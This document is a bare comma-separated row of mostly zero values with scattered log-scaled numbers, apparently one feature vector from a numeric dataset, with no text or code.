0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.6913478822291435, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.178053830347946, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.969640753475787, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.0301047650807, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 4.160336650881089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.970291913552122, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.9459101490553132, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.8903717578961645, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.58351893845611, 3.649511027115099, 0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 4.553876891600541, 0.0, 1.0986122886681098, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 3.8918202981106265, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 3.9384838577066197, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.0301047650807, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.330408475910399, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.679743138077019, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.3862943611198906, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 